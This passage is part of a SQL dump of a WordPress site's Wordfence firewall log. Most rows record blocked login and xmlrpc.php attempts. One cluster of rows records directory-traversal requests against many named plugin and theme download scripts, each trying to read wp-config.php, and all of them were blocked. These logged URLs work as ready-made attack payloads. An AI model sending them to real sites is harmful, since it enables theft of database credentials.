Network',NULL),(10064,0.000000,1630674979.933296,'\0\0\0\0\0\0\0\0\0\0��m��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10065,0.000000,1630675432.046916,'\0\0\0\0\0\0\0\0\0\0��6\'1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10066,0.000000,1630675905.509719,'\0\0\0\0\0\0\0\0\0\0����\'B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10067,0.000000,1630676345.318282,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10068,0.000000,1630676814.660529,'\0\0\0\0\0\0\0\0\0\0��g�ʖ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10069,1630676931.193462,1630676931.105700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10070,1630676925.172859,1630676925.059700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10071,1630676942.834868,1630676942.750300,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(10072,1630676957.932997,1630676957.839400,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10073,1630676952.706743,1630676952.623500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10074,1630676991.309566,1630676991.224500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(10075,1630677033.953930,1630677033.870500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10076,1630677028.663485,1630677028.569800,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10077,1630677023.478147,1630677023.393700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10078,1630677018.335901,1630677018.250400,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(10079,1630677012.930255,1630677012.660200,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(10080,1630677007.092680,1630677006.977700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(10081,1630677001.708593,1630677001.603300,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10082,1630677063.021893,1630677062.937900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=...%2F.%2F...%2F.%2F...%2F.%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF9maWxlXQ==\",\"paramValue\":\"Li4uLy4vLi4uLy4vLi4uLy4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLXNpbXBsaWZpZWQtZm9yLW9hcC1tZW1iZXJzLW9ubHkvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10083,1630677055.347570,1630677055.260900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(10084,1630677047.796888,1630677047.499600,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(10085,0.000000,1630677307.473715,'\0\0\0\0\0\0\0\0\0\0����\'B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10086,0.000000,1630677410.689211,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10087,0.000000,1630677818.767385,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10088,0.000000,1630678242.158757,'\0\0\0\0\0\0\0\0\0\0��E��p',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10089,0.000000,1630678266.169727,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10090,0.000000,1630678726.629810,'\0\0\0\0\0\0\0\0\0\0���zaD',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10091,0.000000,1630679227.008128,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10092,0.000000,1630679705.087586,'\0\0\0\0\0\0\0\0\0\0���AL&',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10093,0.000000,1630679708.070702,'\0\0\0\0\0\0\0\0\0\0���\0�D',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10094,0.000000,1630680199.729901,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10095,0.000000,1630680546.027775,'\0\0\0\0\0\0\0\0\0\0���I�-',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10096,0.000000,1630680678.220046,'\0\0\0\0\0\0\0\0\0\0��Y���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10097,0.000000,1630681550.073534,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10098,0.000000,1630682013.258508,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10099,0.000000,1630682042.275574,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10100,0.000000,1630682526.162033,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10101,0.000000,1630682846.813702,'\0\0\0\0\0\0\0\0\0\0���#~f',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10102,0.000000,1630683024.191661,'\0\0\0\0\0\0\0\0\0\0��X�%1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10103,0.000000,1630683505.572493,'\0\0\0\0\0\0\0\0\0\0��h�P�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10104,0.000000,1630684005.618286,'\0\0\0\0\0\0\0\0\0\0���;!�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10105,0.000000,1630684488.019283,'\0\0\0\0\0\0\0\0\0\0��>�q�',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10106,0.000000,1630684977.698320,'\0\0\0\0\0\0\0\0\0\0����r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10107,0.000000,1630685167.560812,'\0\0\0\0\0\0\0\0\0\0���;�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10108,0.000000,1630685531.853438,'\0\0\0\0\0\0\0\0\0\0��m��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10109,0.000000,1630686010.690456,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10110,0.000000,1630686432.753968,'\0\0\0\0\0\0\0\0\0\0��h',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10111,0.000000,1630686495.542157,'\0\0\0\0\0\0\0\0\0\0���:�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10112,0.000000,1630687190.083847,'\0\0\0\0\0\0\0\0\0\0���F�',0,200,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10113,0.000000,1630687221.795552,'\0\0\0\0\0\0\0\0\0\0��gmш',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10114,0.000000,1630687502.114643,'\0\0\0\0\0\0\0\0\0\0��_o�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10115,0.000000,1630688621.452920,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10116,0.000000,1630688653.878629,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10117,0.000000,1630690095.128887,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10118,0.000000,1630690100.491658,'\0\0\0\0\0\0\0\0\0\0��C��T',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10119,0.000000,1630691309.195479,'\0\0\0\0\0\0\0\0\0\0��@o~ ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10120,0.000000,1630691523.320371,'\0\0\0\0\0\0\0\0\0\0���;��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10121,0.000000,1630691553.724870,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10122,0.000000,1630692238.048050,'\0\0\0\0\0\0\0\0\0\0��D�\\*',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10123,0.000000,1630693007.328827,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10124,0.000000,1630693019.986469,'\0\0\0\0\0\0\0\0\0\0��xO�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10125,0.000000,1630693839.828577,'\0\0\0\0\0\0\0\0\0\0��-�A*',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10126,0.000000,1630694453.426700,'\0\0\0\0\0\0\0\0\0\0���\n�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10127,0.000000,1630694486.593018,'\0\0\0\0\0\0\0\0\0\0���7]',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10128,0.000000,1630694810.162120,'\0\0\0\0\0\0\0\0\0\0��-xEy',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10129,0.000000,1630695951.141912,'\0\0\0\0\0\0\0\0\0\0���n�J',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10130,0.000000,1630695964.465971,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 5.0; rv:32.0) Gecko/20100101 Firefox/32.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10131,0.000000,1630695974.785156,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10132,0.000000,1630696506.157538,'\0\0\0\0\0\0\0\0\0\0����l',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) 